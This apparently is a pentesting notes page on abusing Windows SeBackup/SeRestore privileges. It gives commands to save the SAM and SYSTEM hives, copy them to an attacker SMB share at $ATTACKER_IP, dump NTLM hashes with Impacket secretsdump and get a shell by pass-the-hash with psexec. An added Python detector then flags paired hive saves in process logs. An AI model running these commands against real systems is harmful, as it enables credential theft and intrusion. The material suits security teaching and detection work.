# Windows SeBackup and SeRestore permissions

These permissions allow full read (SeBackup) and write (SeRestore) access to any file. The first of these allows for exfiltration, while the second allows binaries to be replaced at will (combine with service- or task-based attacks!).

The "Backup Operators" group has *both* of these permissions!

Back up useful registry hives:

```powershell
reg save HKLM\SYSTEM $PATH_TO_HIVE_FILE
reg save HKLM\SAM $PATH_TO_HIVE_FILE
```

Run a local SMB server with [[Impacket]]:

```bash
impacket-smbserver -smb2support -username $CONNECTION_USER \
    -password $CONNECTION_PASSWORD $SHARE_NAME $PATH_TO_DIRECTORY
```

Then, just use copy on Windows:

```powershell
copy $FILE \\$ATTACKER_IP\$SHARE_NAME\
```

Use [[Impacket]] to dump hashes from a hive and perform a pass-the-hash attack:

```bash
# Get hashes from SAM/SYSTEM hives
impacket-secretsdump -sam $SAM_HIVE_FILE \
    -system $SYSTEM_HIVE_FILE LOCAL

# Get a shell by passing a hash
impacket-psexec -hashes $FULL_NTLM_HASH $TARGET_USER@$TARGET_IP
```
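
On the detection side, the `reg save` commands above leave a trace in process-creation telemetry (Security Event ID 4688 with command-line auditing, or Sysmon Event ID 1). The following is an added example, not part of the original page: it flags a user who saves both the SAM and SYSTEM hives on one host within a short window. The record fields (`host`, `user`, `time`, `cmd`), the 10-minute window and the sample events are assumptions constructed for illustration.

```python
import re
from datetime import datetime, timedelta

# `reg save` of a whole SAM/SYSTEM/SECURITY hive: reg or reg.exe, HKLM or long form, any case.
REG_SAVE = re.compile(
    r'(?:^|[\\/\s"])reg(?:\.exe)?"?\s+save\s+"?'
    r'(?:HKLM|HKEY_LOCAL_MACHINE)\\(SAM|SYSTEM|SECURITY)(?=["\s]|$)',
    re.IGNORECASE,
)

def saved_hive(command_line):
    """Return the hive name (upper case) for a sensitive `reg save`, else None."""
    m = REG_SAVE.search(command_line)
    return m.group(1).upper() if m else None

def detect_hive_pairs(events, window=timedelta(minutes=10)):
    """Flag (host, user) pairs that saved both SAM and SYSTEM within `window`;
    offline hash extraction needs both hives, so the pair is the strong signal."""
    last_seen = {}  # (host, user, hive) -> time of the most recent save
    alerts = []
    for ev in sorted(events, key=lambda e: e["time"]):
        hive = saved_hive(ev["cmd"])
        if hive not in ("SAM", "SYSTEM"):
            continue
        key = (ev["host"], ev["user"])
        other = "SYSTEM" if hive == "SAM" else "SAM"
        prev = last_seen.get(key + (other,))
        if prev is not None and ev["time"] - prev <= window:
            alerts.append({"host": ev["host"], "user": ev["user"], "time": ev["time"]})
        last_seen[key + (hive,)] = ev["time"]
    return alerts

# Constructed sample records (not real logs), shaped like process-creation events.
T0 = datetime(2024, 1, 1, 12, 0, 0)
SAMPLE = [
    {"host": "WS01", "user": "svc_backup", "time": T0,
     "cmd": r"reg save HKLM\SYSTEM C:\Temp\system.hiv"},
    {"host": "WS01", "user": "svc_backup", "time": T0 + timedelta(seconds=40),
     "cmd": r'"C:\Windows\System32\reg.exe" SAVE hklm\sam C:\Temp\sam.hiv'},
    {"host": "WS02", "user": "alice", "time": T0,   # unrelated key: ignored
     "cmd": r"reg save HKLM\SOFTWARE\Vendor C:\Temp\vendor.hiv"},
    {"host": "WS03", "user": "bob", "time": T0,     # pair is 3 h apart: no alert
     "cmd": r"reg save HKLM\SAM C:\Temp\a.hiv"},
    {"host": "WS03", "user": "bob", "time": T0 + timedelta(hours=3),
     "cmd": r"reg save HKLM\SYSTEM C:\Temp\b.hiv"},
]

if __name__ == "__main__":
    print(detect_hive_pairs(SAMPLE))
```

Legitimate backup agents can trigger the same pattern, so baseline the accounts and hosts where hive saves are expected before alerting on the rest.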